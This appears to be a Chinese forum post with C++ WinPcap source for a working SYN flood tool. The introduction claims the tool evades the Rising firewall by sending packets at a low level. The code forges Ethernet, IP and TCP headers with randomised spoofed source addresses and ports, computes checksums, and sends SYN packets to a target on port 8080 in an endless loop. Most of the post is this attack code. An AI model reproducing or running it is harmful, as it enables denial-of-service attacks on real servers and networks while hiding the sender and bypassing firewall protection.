直接绕过瑞星防火墙了
可能是瑞星hook某个函数
wincap直接操作底层,所以瑞星没报
环境什么的和原来的一样
#define WIN32
#define HAVE_REMOTE
#define _XKEYCHECK_H
#define _CRT_SECURE_NO_WARNINGS
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#define _CRT_SECURE_NO_DEPRECATE 1
#define _CRT_NONSTDC_NO_DEPRECATE 1
#include <stdio.h>
#include <stdlib.h>
#include <pcap.h>
#include <winsock2.h>
#include <conio.h>
#include <iostream>
#include <packet32.h>
#include <ntddndis.h>
#include <time.h>
#include <string>
#include <vector>
#include "remote-ext.h"
#pragma comment(lib,"wpcap.lib")
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"Packet.lib")
using namespace std;
/* IP报文格式
0 8 16 32
+------------+------------+-------------------------+
| ver + hlen | 服务类型 | 总长度 |
+------------+------------+----+--------------------+
| 标识位 |flag| 分片偏移(13位) |
+------------+------------+----+--------------------+
| 生存时间 | 高层协议号 | 首部校验和 |
+------------+------------+-------------------------+
| 源 IP 地址 |
+---------------------------------------------------+
| 目的 IP 地址 |
+---------------------------------------------------+
*/
struct IP_HEADER
{
byte versionAndHeader;
byte serviceType;
byte totalLen[2];
byte seqNumber[2];
byte flagAndFragPart[2];
byte ttl;
byte hiProtovolType;
byte headerCheckSum[2];
byte srcIpAddr[4];
byte dstIpAddr[4];
};
/*
TCP 报文
0 16 32
+------------------------+-------------------------+
| 源端口地址 | 目的端口地址 |
+------------------------+-------------------------+
| 序列号 |
+--------------------------------------------------+
| 确认号 |
+------+--------+--------+-------------------------+
|HLEN/4| 保留位 |控制位/6| 窗口尺寸 |
+------+--------+--------+-------------------------+
| 校验和 | 应急指针 |
+------------------------+-------------------------+
*/
struct TCP_HEADER
{
byte srcPort[2];//源端口
byte dstPort[2];//目标端口
byte seqNumber[4];
byte ackNumber[4];
byte headLen;
byte contrl;
byte wndSize[2];
byte checkSum[2];
byte uragentPtr[2];
};
struct PSDTCP_HEADER
{
byte srcIpAddr[4]; //Source IP address; 32 bits
byte dstIpAddr[4]; //Destination IP address; 32 bits
byte padding; //padding
byte protocol; //Protocol; 8 bits
byte tcpLen[2]; //TCP length; 16 bits
};
struct ETHERNET_HEADER
{
byte dstMacAddr[6];
byte srcMacAddr[6];
byte ethernetType[2];
};
struct DEVS_INFO
{
char szDevName[512];
char szDevsDescription[512];
};
int GetAllDevs(DEVS_INFO devsList[])
{
int nDevsNum = 0;
pcap_if_t *alldevs;
char errbuf[PCAP_ERRBUF_SIZE];
if (pcap_findalldevs(&alldevs, errbuf) == -1)
{
return -1;
printf("error in pcap_findalldevs_ex: %s\n", errbuf);
}
for (pcap_if_t *d = alldevs; d != NULL; d = d->next)
{
strcpy(devsList[nDevsNum].szDevName, d->name);
strcpy(devsList[nDevsNum].szDevsDescription, d->description);
nDevsNum++;
}
pcap_freealldevs(alldevs);
return nDevsNum;
}
int GetAdapterMacAddr(char *lpszAdapterName, unsigned char ucMacAddr[])
{
LPADAPTER lpAdapter = PacketOpenAdapter(lpszAdapterName);
if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
{
return -1;
}
PPACKET_OID_DATA oidData = (PPACKET_OID_DATA)malloc(6 + sizeof(PACKET_OID_DATA));
if (NULL == oidData)
{
PacketCloseAdapter(lpAdapter);
return -1;
}
oidData->Oid = OID_802_3_CURRENT_ADDRESS;
oidData->Length = 6;
memset(oidData->Data, 0, 6);
BOOLEAN bStatus = PacketRequest(lpAdapter, FALSE, oidData);
if (bStatus)
{
for (int i = 0; i < 6; ++i)
{
ucMacAddr[i] = (oidData->Data)[i];
}
}
else
{
return -1;
free(oidData);
}
free(oidData);
PacketCloseAdapter(lpAdapter);
return 0;
}
char *FormatMacAddr(unsigned char *ucMacAddr, char *szStr)
{
szStr[0] = '\0';
char str[8];
for (int i = 0; i < 6; ++i)
{
sprintf(str, "0x%02x-", ucMacAddr[i]);
if (str[2] >= 'a' && str[2] <= 'z')
{
str[2] = 'A' + str[2] - 'a';
}
if (str[3] >= 'a' && str[3] <= 'z')
{
str[3] = 'A' + str[3] - 'a';
}
strcat(szStr, str);
}
szStr[strlen(szStr) - 1] = '\0';
return szStr;
}
char *FormatIpAddr(unsigned uIpAddr, char szIp[])
{
IN_ADDR addr;
addr.S_un.S_addr = uIpAddr;
strcpy(szIp, inet_ntoa(addr));
return szIp;
}
int GetIpByHost(const char *lpszHost, std::vector<std::string> &ipList)
{
WSADATA wsadata;
WSAStartup(MAKEWORD(2, 2), &wsadata);
hostent *phost = gethostbyname(lpszHost);
in_addr addr;
char *p = phost->h_addr_list[0];
for (int i = 1; NULL != p; i++)
{
memcpy(&addr.S_un.S_addr, p, phost->h_length);
ipList.push_back(inet_ntoa(addr));
p = phost->h_addr_list[i];
}
return 0;
}
int GetGatewayMacAddr(byte macAddr[])
{
byte mac[] = { 0x00, 0x00, 0x5e, 0x00, 0x01, 0x48 };
//00-00-5e-00-01-48
memcpy(macAddr, mac, 6);
return 0;
}
void DecodeTcpPacket(const byte *packet)
{
TCP_HEADER *pTcpHeader = (TCP_HEADER *)packet;
//printf("%d\n", pTcpHeader->contrl);
//printf("%d\n", (0x01 << 4) | (0x1 << 1) );
if (pTcpHeader->contrl == 18)// (0x01 << 4) | (0x1 << 1) )
{
printf("收到ack回应");
}
}
void DecodeIpPacket(const unsigned char *ucPacket)
{
IP_HEADER *pIpHeader = (IP_HEADER *)ucPacket;
unsigned srcIp = *(unsigned *)pIpHeader->srcIpAddr;
unsigned dstIp = *(unsigned *)pIpHeader->dstIpAddr;
memcpy(&srcIp, pIpHeader->srcIpAddr, 4);
memcpy(&dstIp, pIpHeader->dstIpAddr, 4);
char szSrcIp[32], szDstIp[32];
FormatIpAddr(srcIp, szSrcIp);
FormatIpAddr(dstIp, szDstIp);
if (0 != strcmp("10.126.72.37", szDstIp) || 0 != strcmp("112.80.248.73", szSrcIp)) return;
if (pIpHeader->hiProtovolType != 0x06) return;
DecodeTcpPacket((byte *)(ucPacket + sizeof(IP_HEADER)));
//printf("Ip: %s\t%s\n", szSrcIp,szDstIp );
}
void HandlePacketCallBack(unsigned char *param, const struct pcap_pkthdr* packet_header, const unsigned char *ucCaptureContent)
{
ETHERNET_HEADER *pEthHeader = (ETHERNET_HEADER *)ucCaptureContent;
if (*((unsigned short *)(pEthHeader->ethernetType)) == htons(0x0800))
{
ETHERNET_HEADER *pEthHeader = (ETHERNET_HEADER *)ucCaptureContent;
unsigned char srcMac[6], dstMac[6];
memcpy(srcMac, pEthHeader->srcMacAddr, 6);
memcpy(dstMac, pEthHeader->dstMacAddr, 6);
char szSrcMac[32], szDstMac[32];
FormatMacAddr(srcMac, szSrcMac);
FormatMacAddr(dstMac, szDstMac);
//printf("MAC: %s\t%s\n", szSrcMac,szDstMac );
DecodeIpPacket(ucCaptureContent + sizeof(ETHERNET_HEADER));
}
return;
}
//校验和
unsigned short CheckSum(unsigned short packet[], int size)
{
unsigned long cksum = 0;
while (size > 1)
{
cksum += *packet++;
size -= sizeof(USHORT);
}
if (size)
{
cksum += *(UCHAR*)packet;
}
cksum = (cksum >> 16) + (cksum & 0xFFFF);
cksum += (cksum >> 16);
return (USHORT)(~cksum);
}
//包,源地址,目标地址,源mac
int EncodeSynPacket(byte packet[], const char *lpszSrcIpAddr, const char *lpszDstIpAddr, byte srcMacAddr[])
{
TCP_HEADER tcpHeader;
memset(&tcpHeader, 0, sizeof tcpHeader);
*(unsigned short *)tcpHeader.srcPort = htons(9999);//源端口
*(unsigned short *)tcpHeader.dstPort = htons(8080);//目标端口
*(unsigned int *)tcpHeader.seqNumber = htonl(0xFFFF);
*(unsigned int *)tcpHeader.ackNumber = htonl(0x00);
tcpHeader.headLen = 5 << 4;
tcpHeader.contrl = 1 << 1;
*(unsigned short *)tcpHeader.wndSize = htons(0xFFFF);
IP_HEADER ipHeader;
memset(&ipHeader, 0, sizeof ipHeader);
unsigned char versionAndLen = 0x04;
versionAndLen <<= 4;
versionAndLen |= sizeof ipHeader / 4; //版本 + 头长度
ipHeader.versionAndHeader = versionAndLen;
*(unsigned short *)ipHeader.totalLen = htons(sizeof(IP_HEADER) + sizeof(TCP_HEADER));
ipHeader.ttl = 0xFF;
ipHeader.hiProtovolType = 0x06;
*(unsigned int *)(ipHeader.srcIpAddr) = inet_addr(lpszSrcIpAddr);
*(unsigned int *)(ipHeader.dstIpAddr) = inet_addr(lpszDstIpAddr);
//*(unsigned short *)(ipHeader.headerCheckSum) = CheckSum( (unsigned short *)&ipHeader, sizeof ipHeader );
byte gatewayMac[] = { 0x00, 0x00, 0x5e, 0x00, 0x01, 0x48 };
ETHERNET_HEADER ethHeader;
memset(ðHeader, 0, sizeof ethHeader);
memcpy(ethHeader.dstMacAddr, gatewayMac, 6);
memcpy(ethHeader.srcMacAddr, srcMacAddr, 6);
*(unsigned short *)ethHeader.ethernetType = htons(0x0800);
//memset(packet, 0, sizeof packet);
memcpy(packet, ðHeader, sizeof ethHeader);
memcpy(packet + sizeof ethHeader, &ipHeader, sizeof ipHeader);
memcpy(packet + sizeof ethHeader + sizeof ipHeader, &tcpHeader, sizeof tcpHeader);
return (sizeof ethHeader + sizeof ipHeader + sizeof tcpHeader);
}
int main()
{
system("mode con cols=110 lines=20");//dos 分辨率改变
DEVS_INFO devsList[64];
int nDevsNum = GetAllDevs(devsList);//得到网卡数量
if (nDevsNum < 1)
{
printf("Get adapter infomation failed!");
exit(0);
}
int selIndex = 1;//选择网卡号
if (nDevsNum == 1)
{
printf("%d %s\t%s\n", 0 + 1, devsList[0].szDevName, devsList[0].szDevsDescription);
printf("Only one adapter");
}
else{
for (int i = 0; i < nDevsNum; ++i)
{
printf("%d %s\t%s\n", i + 1, devsList[i].szDevName, devsList[i].szDevsDescription);
}
printf("Input your select adapter index: ");
scanf("%d", &selIndex);
if (selIndex < 0 || selIndex > nDevsNum + 1)
{
printf("Out of range!\nPress any key to exit...");
getch();
return 0;
}
}
char szError[PCAP_ERRBUF_SIZE];
pcap_t *handle = pcap_open_live(devsList[selIndex - 1].szDevName, 65536, 1, 1000, szError);//获得数据包捕获描述字的函数,取得网卡句柄
if (NULL == handle)
{
printf("Open adapter failed!\nPress any key to exit...");
getch();
return 0;
}
byte localMacAddr[6];//本机mac地址
memset(localMacAddr, 0, sizeof localMacAddr);//设置内存空间
if (0 != GetAdapterMacAddr(devsList[selIndex - 1].szDevName, localMacAddr))//保存mac
{
printf("Get localhost mac addr failed!\nPress any key to exit...");
getch();
return 0;
}
std::vector<std::string> ipList;
GetIpByHost("www.baidu.com", ipList);
ipList[0] = "192.168.1.108";
byte packet[1024];
int size = EncodeSynPacket(packet, "10.126.72.37", ipList[0].c_str(), localMacAddr);
//pcap_sendpacket(handle, packet, size );
//return 0;
IP_HEADER *pIpHeader = (IP_HEADER *)(packet + sizeof(ETHERNET_HEADER));
TCP_HEADER *pTcpHeader = (TCP_HEADER *)(packet + sizeof(ETHERNET_HEADER) + sizeof(IP_HEADER));
//*srand(time(0));
unsigned short srcPort = 0;//= rand() %0xFFFFFFFF;//源端口
unsigned int srcIpAddr = 0;//源ip
unsigned int baseIpAddr = ntohl(inet_addr("192.168.0.0"));
/*
struct PSDTCP_HEADER
{
byte srcIpAddr[4]; //Source IP address; 32 bits
byte dstIpAddr[4]; //Destination IP address; 32 bits
byte padding; //padding
byte protocol; //Protocol; 8 bits
byte tcpLen[2]; //TCP length; 16 bits
} ;
*/
byte psdPacket[128];//伪造包
memset(psdPacket, 0x00, sizeof psdPacket);
PSDTCP_HEADER *psdHeader = (PSDTCP_HEADER *)psdPacket;
*(unsigned int *)(psdHeader->dstIpAddr) = inet_addr(ipList[0].c_str());
*(unsigned int *)(psdHeader->srcIpAddr) = inet_addr("10.126.72.37");
*(unsigned short *)(psdHeader->tcpLen) = htons(sizeof(TCP_HEADER));
psdHeader->protocol = 0x06;
psdHeader->padding = 0x00;
memcpy(psdPacket + sizeof(PSDTCP_HEADER), pTcpHeader, sizeof(TCP_HEADER));
int count = 0;
while (1)// count++ < 200 )
{
srcPort = rand() % 0xFFFF;
unsigned int dstIP = baseIpAddr + rand() % 0xFFFF;
srcIpAddr = dstIP;//ntohl(inet_addr(dstIP));//baseIpAddr + rand() % 0xFFFF;
*(unsigned int *)(pIpHeader->srcIpAddr) = htonl(srcIpAddr);//假IP
*(unsigned short *)(pIpHeader->headerCheckSum) = 0x0000;
*(unsigned short *)(pIpHeader->headerCheckSum) = CheckSum((unsigned short *)pIpHeader, sizeof(IP_HEADER));
*(unsigned int *)(psdHeader->srcIpAddr) = htonl(srcIpAddr);
*(unsigned int *)(pTcpHeader->seqNumber) = htonl(rand() % 0xFFFFFF);
*(unsigned int *)(((TCP_HEADER *)(psdPacket + sizeof(PSDTCP_HEADER)))->seqNumber) = *(unsigned int *)(pTcpHeader->seqNumber);
*(unsigned short *)(pTcpHeader->srcPort) = htons(srcPort);
*(unsigned short *)(((TCP_HEADER *)(psdPacket + sizeof(PSDTCP_HEADER)))->srcPort) = htons(srcPort);
*(unsigned short *)(pTcpHeader->checkSum) = 0x0000;
*(unsigned short *)(pTcpHeader->checkSum) = CheckSum((unsigned short *)psdPacket, sizeof(PSDTCP_HEADER) + sizeof(TCP_HEADER));
//system("pause");
pcap_sendpacket(handle, packet, size);
}
if (NULL == handle)
{
printf("\nUnable to open the adapter. %s is not supported by WinPcap\n");
return 0;
}
pcap_loop(handle, -1, HandlePacketCallBack, NULL);
pcap_close(handle);
return 0;
/*TCP_HEADER tcpHeader;
memset(&tcpHeader, 0, sizeof tcpHeader );
*(unsigned short *)tcpHeader.srcPort = htons(9999);
*(unsigned short *)tcpHeader.dstPort = htons(80);
*(unsigned int *)tcpHeader.seqNumber = htonl(0xFFFF);
*(unsigned int *)tcpHeader.ackNumber = htonl(0x00);
tcpHeader.headLen = 5 << 4;
tcpHeader.contrl = 1 << 1;
*(unsigned short *)tcpHeader.wndSize = htons(0xFFFF);
PSDTCP_HEADER psdHeader;
memset(&psdHeader, 0, sizeof psdHeader);
*(unsigned int *)psdHeader.dstIpAddr = inet_addr("112.80.248.73");
*(unsigned int *)psdHeader.srcIpAddr = inet_addr("10.126.72.37");
psdHeader.protocol = 0x06;
*(unsigned short *)psdHeader.tcpLen = htons(sizeof(TCP_HEADER));
char data[] = "Hello world";
byte psdPacket[1024];
memset(psdPacket, 0, sizeof psdPacket);
memcpy( psdPacket, &psdHeader, sizeof psdHeader );
memcpy( psdPacket + sizeof psdHeader, &tcpHeader, sizeof tcpHeader );
memcpy( psdPacket + sizeof psdHeader + sizeof tcpHeader, data, sizeof data );
*(unsigned short *)tcpHeader.checkSum = CheckSum( (unsigned short*) psdPacket, sizeof psdHeader + sizeof tcpHeader );
IP_HEADER ipHeader;
memset( &ipHeader, 0, sizeof ipHeader );
unsigned char versionAndLen = 0x04;
versionAndLen <<= 4;
versionAndLen |= sizeof ipHeader / 4; //版本 + 头长度
ipHeader.versionAndHeader = versionAndLen;
*(unsigned short *)ipHeader.totalLen = htons( sizeof(IP_HEADER) + sizeof(TCP_HEADER) );
ipHeader.ttl = 0xFF;
ipHeader.hiProtovolType = 0x06;
*(unsigned int *)(ipHeader.srcIpAddr) = inet_addr("10.126.72.37");
*(unsigned int *)(ipHeader.dstIpAddr) = inet_addr("112.80.248.73");
*(unsigned short *)(ipHeader.headerCheckSum) = CheckSum( (unsigned short *)&ipHeader, sizeof ipHeader );
byte srcMac[] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
//byte srcMac[] = {0x90, 0x2B, 0x34, 0x9A, 0xC2, 0xBB};
byte dstMac[] = {0x00, 0x00, 0x5e, 0x00, 0x01, 0x48};
ETHERNET_HEADER ethHeader;
memset(ðHeader, 0, sizeof ethHeader);
memcpy(ethHeader.dstMacAddr, dstMac, 6);
memcpy(ethHeader.srcMacAddr, srcMac, 6);
*(unsigned short *)ethHeader.ethernetType = htons(0x0800);
byte packet[1024];
memset(packet, 0, sizeof packet);
memcpy(packet, ðHeader, sizeof ethHeader);
memcpy(packet + sizeof ethHeader, &ipHeader, sizeof ipHeader);
memcpy(packet + sizeof ethHeader + sizeof ipHeader, &tcpHeader, sizeof tcpHeader);
memcpy(packet + sizeof ethHeader + sizeof ipHeader + sizeof tcpHeader, data, sizeof data );
int size = sizeof ethHeader + sizeof ipHeader + sizeof tcpHeader;// + sizeof data;
//while ( 1 )
{
system("pause");
//pcap_sendpacket(handle, packet, size );
}
if ( NULL == handle )
{
printf("\nUnable to open the adapter. %s is not supported by WinPcap\n");
return 0;
}
pcap_loop( handle, -1, HandlePacketCallBack, NULL );
pcap_close(handle);
return 0;*/
}